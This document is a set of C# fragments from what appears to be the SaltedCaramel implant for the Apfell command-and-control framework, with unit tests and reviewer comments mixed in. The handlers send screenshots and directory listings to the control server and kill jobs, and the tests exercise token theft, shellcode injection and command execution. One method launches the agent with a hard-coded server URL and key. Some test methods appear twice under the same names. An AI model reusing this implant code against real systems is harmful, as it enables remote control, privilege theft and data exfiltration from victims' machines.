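/// <summary>
/// Dispatches a <c>steal_token</c> task with an empty parameter string through
/// <c>DispatchTask</c> and expects the task to end with status <c>complete</c>.
/// </summary>
/// <remarks>
/// The outcome depends on the host and account running the test. Judging by the
/// test name, the empty parameter presumably selects winlogon as the token source
/// (confirm against the task implementation).
/// NOTE(review): no cleanup follows the dispatch; if a successful steal_token leaves
/// the test thread impersonating another token, later tests inherit that state.
/// </remarks>
public void TokenWinlogon()
{
    SCTask task = new SCTask("steal_token", "", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("complete", task.status);
}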
/// <summary>
/// Runs the <c>cd</c> task directly via <c>Tasks.ChangeDir.Execute</c> against
/// <c>C:\Temp</c> and expects status <c>complete</c>.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably requires <c>C:\Temp</c> to exist on the test host.
/// </remarks>
public void TaskChangeDirValid()
{
    const string expectedStatus = "complete";
    var cdTask = new SCTask("cd", "C:\\Temp", "1");

    Tasks.ChangeDir.Execute(cdTask);

    Assert.AreEqual(expectedStatus, cdTask.status);
}
/// <summary>
/// Runs the <c>cd</c> task directly via <c>Tasks.ChangeDir.Execute</c> against
/// <c>C:\asdf</c> and expects status <c>error</c>.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably relies on <c>C:\asdf</c> not existing on the test host.
/// </remarks>
public void TaskChangeDirInvalid()
{
    const string expectedStatus = "error";
    var cdTask = new SCTask("cd", "C:\\asdf", "1");

    Tasks.ChangeDir.Execute(cdTask);

    Assert.AreEqual(expectedStatus, cdTask.status);
}
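/// <summary>
/// Dispatches a <c>cd</c> task for <c>C:\Temp</c> through <c>DispatchTask</c> and
/// expects status <c>complete</c>.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably requires <c>C:\Temp</c> to exist on the test host.
/// </remarks>
public void TaskChangeDirValid()
{
    SCTask task = new SCTask("cd", "C:\\Temp", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("complete", task.status);
}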
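/// <summary>
/// Dispatches a <c>shinject</c> task with an empty parameter string through
/// <c>DispatchTask</c> and expects status <c>complete</c>.
/// </summary>
/// <remarks>
/// NOTE(review): what the task loads when given no parameters is not visible here;
/// the test presumably exercises the real code path inside the test host process.
/// </remarks>
public void Shellcode()
{
    SCTask task = new SCTask("shinject", "", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("complete", task.status);
}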
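/// <summary>
/// Dispatches a <c>cd</c> task for <c>C:\asdf</c> through <c>DispatchTask</c> and
/// expects status <c>error</c>.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably relies on <c>C:\asdf</c> not existing on the test host.
/// </remarks>
public void TaskChangeDirInvalid()
{
    SCTask task = new SCTask("cd", "C:\\asdf", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("error", task.status);
}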
// Same workflow as sending a file to Apfell server, but we only use one chunk
/// <summary>
/// Uploads a screenshot as a single-chunk file transfer: registers the transfer,
/// posts the base64-encoded bytes as chunk 1, then signals completion.
/// </summary>
/// <param name="implant">Provides <c>PostResponse</c> and <c>SendComplete</c> for talking to the server.</param>
/// <param name="task">Task whose id tags every message; receives status/message on failure.</param>
/// <param name="screenshot">Raw image bytes to be base64-encoded into the chunk.</param>
/// <remarks>
/// Visible message sequence, useful when matching this against captured traffic:
/// a JSON body containing <c>total_chunks</c> and <c>task</c>, then a serialised
/// <c>FileChunk</c> (<c>chunk_num</c>, <c>file_id</c>, <c>chunk_data</c>), then the
/// completion call. How <c>PostResponse</c> wraps or encrypts these is not visible here.
/// </remarks>
private static void SendCapture(SCImplant implant, SCTask task, byte[] screenshot)
{
    try // Try block for HTTP request
    {
        // Send total number of chunks to Apfell server
        // Number of chunks will always be one for screen capture task
        // Receive file ID in response
        // NOTE(review): the JSON is assembled by string concatenation, so task.id is embedded unescaped.
        SCTaskResp initial = new SCTaskResp(task.id, "{\"total_chunks\": " + 1 + ", \"task\":\"" + task.id + "\"}");
        // NOTE(review): a reply that deserialises to null is not checked; the next line would then
        // throw and be reported through the catch below.
        DownloadReply reply = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial));
        Debug.WriteLine($"[-] SendCapture - Received reply, file ID: " + reply.file_id);

        // Convert chunk to base64 blob and create our FileChunk
        FileChunk fc = new FileChunk();
        fc.chunk_num = 1;
        fc.file_id = reply.file_id;
        fc.chunk_data = Convert.ToBase64String(screenshot);

        // Send our FileChunk to Apfell server
        // Receive status in response
        SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fc));
        Debug.WriteLine($"[+] SendCapture - CHUNK SENT: {fc.chunk_num}");
        // postReply is assigned but never read.
        string postReply = implant.PostResponse(response);
        // NOTE(review): this argument calls PostResponse(response) a second time instead of
        // printing postReply. Assuming Debug is System.Diagnostics.Debug, the call is only
        // compiled when DEBUG is defined, so debug and release builds differ in how many
        // times the chunk is posted.
        Debug.WriteLine($"[-] SendCapture - RESPONSE: {implant.PostResponse(response)}");

        // Tell the Apfell server file transfer is done
        implant.SendComplete(task.id);
    }
    catch (Exception e) // Catch exceptions from HTTP requests
    {
        // Something failed, so we need to tell the server about it
        // NOTE(review): only the task object is updated here; nothing is sent to the
        // server from this handler, so reporting is left to whatever reads task.status.
        task.status = "error";
        task.message = e.Message;
    }
}
/// <summary>
/// Handles the <c>jobs</c> and <c>jobkill</c> commands against <c>implant.jobs</c>.
/// </summary>
/// <param name="task">Task whose command selects the branch; status and message are written back to it.</param>
/// <param name="implant">Owner of the job collection that is listed or searched.</param>
/// <remarks>
/// NOTE(review): for <c>jobkill</c>, if no job matches the requested id the task's
/// status and message are never set; the same holds for any command other than the
/// two handled here.
/// </remarks>
public static void Execute(SCTask task, SCImplant implant)
{
    if (task.command == "jobs")
    {
        // Report the whole job collection as JSON.
        task.status = "complete";
        task.message = JsonConvert.SerializeObject(implant.jobs);
    }
    else if (task.command == "jobkill")
    {
        Thread t;
        foreach (Job j in implant.jobs)
        {
            // NOTE(review): the parameter is converted on every iteration and outside the
            // try below, so a non-numeric value throws out of Execute with no status set.
            if (j.shortId == Convert.ToInt32(task.@params))
            {
                t = j.thread;
                try
                {
                    // NOTE(review): assuming t is a System.Threading.Thread, Abort is obsolete
                    // and throws PlatformNotSupportedException on .NET Core / .NET 5+.
                    t.Abort();
                    task.status = "complete";
                    task.message = $"Killed job {j.shortId}";
                }
                catch (Exception e)
                {
                    task.status = "error";
                    task.message = $"Error stopping job {j.shortId}: {e.Message}";
                }
            }
        }
    }
}
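/// <summary>
/// Dispatches a <c>steal_token</c> task with parameter <c>12351</c> through
/// <c>DispatchTask</c> and expects status <c>error</c>.
/// </summary>
/// <remarks>
/// Environment-dependent: the parameter is presumably a process id that is expected
/// not to exist (or not to be accessible) on the test host — confirm.
/// </remarks>
public void TokenInvalid()
{
    SCTask task = new SCTask("steal_token", "12351", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("error", task.status);
}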
/// <summary>
/// Lists a directory through <c>Host.GetDirectoryListing</c>, posts the entries to the
/// server as a JSON array of size/type/name dictionaries, and records the outcome on the task.
/// </summary>
/// <param name="task">Supplies the path in <c>@params</c> (empty string means the parameterless listing) and receives status/message.</param>
/// <param name="implant">Used to post the listing and to report completion or errors.</param>
public static void Execute(SCTask task, SCImplant implant)
{
    string path = task.@params;
    SharpSploitResultList <Host.FileSystemEntryResult> list;
    try
    {
        if (path != "")
        {
            list = Host.GetDirectoryListing(path);
        }
        else
        {
            list = Host.GetDirectoryListing();
        }
        List <Dictionary <string, string> > fileList = new List <Dictionary <string, string> >();
        foreach (Host.FileSystemEntryResult item in list)
        {
            // NOTE(review): FileInfo resolves a relative name against the current directory;
            // whether item.Name is a full path is not visible here. If it is not, sizes are
            // looked up in the wrong place whenever path differs from the working directory.
            FileInfo f = new FileInfo(item.Name);
            Dictionary <string, string> infoDict = new Dictionary <string, string>();
            try
            {
                // f.Length throws when the entry is not an existing file, which is what
                // routes directories (and anything unreadable) to the catch below.
                infoDict.Add("size", f.Length.ToString());
                infoDict.Add("type", "file");
                infoDict.Add("name", f.Name);
                fileList.Add(infoDict);
            }
            catch
            {
                // NOTE(review): every exception type lands here, so a file that merely
                // cannot be inspected is also reported as a directory of size 0.
                infoDict.Add("size", "0");
                infoDict.Add("type", "dir");
                infoDict.Add("name", item.Name);
                fileList.Add(infoDict);
            }
        }
        SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fileList));
        // The server's reply to the post is not inspected.
        implant.PostResponse(response);
        implant.SendComplete(task.id);
        task.status = "complete";
        // NOTE(review): List<T>.ToString() yields the type name, not the entries.
        task.message = fileList.ToString();
    }
    catch (DirectoryNotFoundException)
    {
        Debug.WriteLine($"[!] DirectoryList - ERROR: Directory not found: {path}");
        implant.SendError(task.id, "Error: Directory not found.");
        task.status = "error";
        task.message = "Directory not found.";
    }
    catch (Exception e)
    {
        Debug.WriteLine($"DirectoryList - ERROR: {e.Message}");
        implant.SendError(task.id, $"Error: {e.Message}");
        task.status = "error";
        task.message = e.Message;
    }
}
/// <summary>
/// Runs the <c>powershell</c> task directly via <c>Tasks.Powershell.Execute</c> with
/// <c>Get-Process</c> and expects status <c>complete</c> plus a non-null message.
/// </summary>
public void PowerShellValid()
{
    const string expectedStatus = "complete";
    var psTask = new SCTask("powershell", "Get-Process", "1");

    Tasks.Powershell.Execute(psTask);

    Assert.AreEqual(expectedStatus, psTask.status);
    Assert.IsNotNull(psTask.message);
}
/// <summary>
/// Runs the <c>kill</c> task directly via <c>Tasks.Kill.Execute</c> with parameter
/// <c>1234567</c> and expects status <c>error</c> plus a non-null message.
/// </summary>
/// <remarks>
/// Environment-dependent: the parameter is presumably a process id assumed not to
/// exist on the test host — confirm.
/// </remarks>
public void KillInvalid()
{
    const string expectedStatus = "error";
    var killTask = new SCTask("kill", "1234567", "1");

    Tasks.Kill.Execute(killTask);

    Assert.AreEqual(expectedStatus, killTask.status);
    Assert.IsNotNull(killTask.message);
}
/// <summary>
/// Runs the <c>ls</c> task directly via <c>Tasks.DirectoryList.Execute</c> against
/// <c>C:\asdf</c> and expects status <c>error</c> plus a non-null message.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably relies on <c>C:\asdf</c> not existing on the test host.
/// </remarks>
public void DirectoryListInvalid()
{
    const string expectedStatus = "error";
    var lsTask = new SCTask("ls", "C:\\asdf", "1");

    Tasks.DirectoryList.Execute(lsTask, implant);

    Assert.AreEqual(expectedStatus, lsTask.status);
    Assert.IsNotNull(lsTask.message);
}
/// <summary>
/// Runs the <c>ls</c> task directly via <c>Tasks.DirectoryList.Execute</c> against
/// <c>C:\Temp</c> and expects status <c>complete</c> plus a non-null message.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably requires <c>C:\Temp</c> to exist on the test host.
/// </remarks>
public void DirectoryListValid()
{
    const string expectedStatus = "complete";
    var lsTask = new SCTask("ls", "C:\\Temp", "1");

    Tasks.DirectoryList.Execute(lsTask, implant);

    Assert.AreEqual(expectedStatus, lsTask.status);
    Assert.IsNotNull(lsTask.message);
}
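/// <summary>
/// Runs <c>steal_token</c> directly via <c>Tasks.Token.Execute</c> with parameter
/// <c>12351</c> and expects status <c>error</c>.
/// </summary>
/// <remarks>
/// Environment-dependent: the parameter is presumably a process id expected not to
/// exist (or not to be accessible) on the test host — confirm.
/// </remarks>
public void TokenInvalid()
{
    SCTask task = new SCTask("steal_token", "12351", "1");
    try
    {
        Tasks.Token.Execute(task);
        Assert.AreEqual("error", task.status);
    }
    finally
    {
        // Cleanup must run even when Execute or the assertion throws; otherwise whatever
        // token state Revert undoes would leak into the tests that run afterwards.
        Tasks.Token.Revert();
    }
}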
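/// <summary>
/// Runs <c>steal_token</c> directly via <c>Tasks.Token.Execute</c> with an empty
/// parameter string and expects status <c>complete</c>.
/// </summary>
/// <remarks>
/// The outcome depends on the host and account running the test. Judging by the
/// test name, the empty parameter presumably selects winlogon as the token source
/// (confirm against the task implementation).
/// </remarks>
public void TokenWinlogon()
{
    SCTask task = new SCTask("steal_token", "", "1");
    try
    {
        Tasks.Token.Execute(task);
        Assert.AreEqual("complete", task.status);
    }
    finally
    {
        // Cleanup must run even when Execute or the assertion throws; otherwise whatever
        // token state Revert undoes would leak into the tests that run afterwards.
        Tasks.Token.Revert();
    }
}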
/// <summary>
/// Calls <c>LoadShellcode</c> and, when it returns true, marks the task complete
/// with the message "Shellcode loaded.".
/// </summary>
/// <param name="task">Task that receives the status and message on success.</param>
/// <remarks>
/// NOTE(review): there is no else branch. When <c>LoadShellcode</c> returns false the
/// task's status and message are left as they were, so a failed load is
/// indistinguishable from a task that never ran. <c>LoadShellcode</c> takes no
/// arguments here, so nothing from <paramref name="task"/> is passed to it.
/// </remarks>
public static void Execute(SCTask task)
{
    if (LoadShellcode())
    {
        task.status = "complete";
        task.message = "Shellcode loaded.";
    }
}
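/// <summary>
/// Dispatches a <c>run</c> task with the command line <c>asdf</c> through
/// <c>DispatchTask</c> and expects status <c>error</c> plus a non-null message.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably relies on no executable named <c>asdf</c> being
/// resolvable on the test host.
/// </remarks>
public void ProcInvalid()
{
    SCTask task = new SCTask("run", "asdf", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("error", task.status);
    Assert.IsNotNull(task.message);
}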
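/// <summary>
/// Dispatches a <c>powershell</c> task running <c>Get-Process</c> through
/// <c>DispatchTask</c> and expects status <c>complete</c> plus a non-null message.
/// </summary>
public void PowerShellValid()
{
    SCTask task = new SCTask("powershell", "Get-Process", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("complete", task.status);
    Assert.IsNotNull(task.message);
}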
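/// <summary>
/// Dispatches a <c>run</c> task with the command line <c>whoami</c> through
/// <c>DispatchTask</c> and expects status <c>complete</c> plus a non-null message.
/// </summary>
public void ProcValid()
{
    SCTask task = new SCTask("run", "whoami", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("complete", task.status);
    Assert.IsNotNull(task.message);
}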
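/// <summary>
/// Dispatches a <c>kill</c> task with parameter <c>1234567</c> through
/// <c>DispatchTask</c> and expects status <c>error</c> plus a non-null message.
/// </summary>
/// <remarks>
/// Environment-dependent: the parameter is presumably a process id assumed not to
/// exist on the test host — confirm.
/// </remarks>
public void KillInvalid()
{
    SCTask task = new SCTask("kill", "1234567", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("error", task.status);
    Assert.IsNotNull(task.message);
}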
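/// <summary>
/// Dispatches an <c>ls</c> task for <c>C:\asdf</c> through <c>DispatchTask</c> and
/// expects status <c>error</c> plus a non-null message.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably relies on <c>C:\asdf</c> not existing on the test host.
/// </remarks>
public void DirectoryListInvalid()
{
    SCTask task = new SCTask("ls", "C:\\asdf", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("error", task.status);
    Assert.IsNotNull(task.message);
}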
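/// <summary>
/// Dispatches an <c>ls</c> task for <c>C:\Temp</c> through <c>DispatchTask</c> and
/// expects status <c>complete</c> plus a non-null message.
/// </summary>
/// <remarks>
/// Environment-dependent: presumably requires <c>C:\Temp</c> to exist on the test host.
/// </remarks>
public void DirectoryListValid()
{
    SCTask task = new SCTask("ls", "C:\\Temp", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("complete", task.status);
    Assert.IsNotNull(task.message);
}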
/// <summary>
/// Runs the <c>ps</c> task directly via <c>Tasks.ProcessList.Execute</c> and expects
/// status <c>complete</c>, a non-null message, and the text <c>explorer</c> in that message.
/// </summary>
/// <remarks>
/// Environment-dependent: the last assertion only holds on a host where a process
/// whose listing contains "explorer" is running (an interactive Windows session, presumably).
/// </remarks>
public void ProcessList()
{
    const string expectedStatus = "complete";
    var psTask = new SCTask("ps", "", "1");

    Tasks.ProcessList.Execute(psTask);

    Assert.AreEqual(expectedStatus, psTask.status);
    Assert.IsNotNull(psTask.message);

    bool mentionsExplorer = psTask.message.Contains("explorer");
    Assert.IsTrue(mentionsExplorer);
}
/// <summary>
/// Runs the <c>run</c> task directly via <c>Tasks.Proc.Execute</c> with
/// <c>whoami /priv</c> and expects status <c>complete</c> plus a non-null message.
/// </summary>
/// <remarks>
/// The test first resets the static <c>Tasks.Token.stolenHandle</c> to
/// <c>IntPtr.Zero</c>, presumably so the process is started without a token left
/// over from another test. Because that field is shared static state, the reset
/// also affects any test running concurrently.
/// </remarks>
public void ProcValid()
{
    const string expectedStatus = "complete";
    Tasks.Token.stolenHandle = IntPtr.Zero;
    var runTask = new SCTask("run", "whoami /priv", "1");

    Tasks.Proc.Execute(runTask, implant);

    Assert.AreEqual(expectedStatus, runTask.status);
    Assert.IsNotNull(runTask.message);
}
/// <summary>
/// Runs the <c>run</c> task directly via <c>Tasks.Proc.Execute</c> with the command
/// line <c>asdf</c> and expects status <c>error</c> plus a non-null message.
/// </summary>
/// <remarks>
/// The test first resets the static <c>Tasks.Token.stolenHandle</c> to
/// <c>IntPtr.Zero</c>, presumably so no token from another test is in play. Because
/// that field is shared static state, the reset also affects any test running concurrently.
/// </remarks>
public void ProcInvalid()
{
    const string expectedStatus = "error";
    Tasks.Token.stolenHandle = IntPtr.Zero;
    var runTask = new SCTask("run", "asdf", "1");

    Tasks.Proc.Execute(runTask, implant);

    Assert.AreEqual(expectedStatus, runTask.status);
    Assert.IsNotNull(runTask.message);
}
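/// <summary>
/// Dispatches a <c>ps</c> task through <c>DispatchTask</c> and expects status
/// <c>complete</c>, a non-null message, and the text <c>explorer</c> in that message.
/// </summary>
/// <remarks>
/// Environment-dependent: the last assertion only holds on a host where a process
/// whose listing contains "explorer" is running (an interactive Windows session, presumably).
/// </remarks>
public void ProcessList()
{
    SCTask task = new SCTask("ps", "", "1");

    task.DispatchTask(implant);

    // Expected value first, so a failure message labels expected/actual correctly.
    Assert.AreEqual("complete", task.status);
    Assert.IsNotNull(task.message);
    Assert.IsTrue(task.message.Contains("explorer"));
}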
/// <summary>
/// Creates a new <c>AppDomain</c>, loads the assembly that defines
/// <c>SaltedCaramel</c> into it by full name, and invokes that assembly's entry
/// point with three hard-coded string arguments.
/// </summary>
/// <param name="task">Not read or updated anywhere in this method.</param>
/// <remarks>
/// NOTE(review): the URL, the base64 string and the GUID below are literals in
/// source (and repeated in the commented-out call). They look like a server address,
/// a key and an identifier — confirm — and anything of that kind committed to a
/// repository should be treated as exposed and rotated, with the values supplied
/// from configuration instead.
/// NOTE(review): the created domain is never unloaded, and task.status/message are
/// never set, so the caller gets no result from this command.
/// NOTE(review): AppDomain.CreateDomain is only supported on .NET Framework.
/// </remarks>
public static void Execute(SCTask task)
{
    //typeof(SaltedCaramel).Assembly.EntryPoint.Invoke(null,
    //    new[] { new string[] { "https://192.168.38.192", "CqxQlHyWOSWJprgBA6aiKPP94lCSn8+Ki+gpMVdLNgQ=", "3915d66f-e9a5-4912-8442-910e0cee74df" } });
    AppDomain domain = AppDomain.CreateDomain("asdfasdf");
    Assembly target = domain.Load(typeof(SaltedCaramel).Assembly.FullName);
    string[] args = { "https://192.168.38.192", "CqxQlHyWOSWJprgBA6aiKPP94lCSn8+Ki+gpMVdLNgQ=", "3915d66f-e9a5-4912-8442-910e0cee74df" };
    // The entry point receives the array as its single string[] parameter.
    target.EntryPoint.Invoke(null, new[] { args });
}
// (username, (password, netonly))
// NOTE(review): the tuple note above appears to describe a declaration that sits
// outside this view; it does not describe Execute.

/// <summary>
/// Routes a token task to its handler: <c>steal_token</c> goes to <c>StealToken</c>,
/// <c>make_token</c> goes to <c>MakeToken</c>.
/// </summary>
/// <param name="task">Task whose command selects the handler; passed through unchanged.</param>
/// <remarks>
/// NOTE(review): any other command falls through without touching the task, so the
/// caller sees no status or message for it.
/// </remarks>
public static void Execute(SCTask task)
{
    if (task.command == "steal_token")
    {
        StealToken(task);
    }
    else if (task.command == "make_token")
    {
        MakeToken(task);
    }
}
/// <summary>
/// Reports the task as complete to the server and then terminates the process with
/// exit code 0.
/// </summary>
/// <param name="task">Task whose id is reported.</param>
/// <param name="implant">Used for the completion or error report.</param>
/// <remarks>
/// The process exits whether or not the completion report succeeded, and always with
/// code 0, so the exit code carries no information about the outcome.
/// NOTE(review): if <c>SendError</c> itself throws inside the catch, the exception
/// propagates and <c>Environment.Exit</c> is not reached.
/// </remarks>
public static void Execute(SCTask task, SCImplant implant)
{
    try
    {
        implant.SendComplete(task.id);
    }
    catch (Exception e)
    {
        // Best effort: report why the completion message could not be sent.
        implant.SendError(task.id, e.Message);
    }
    Environment.Exit(0);
}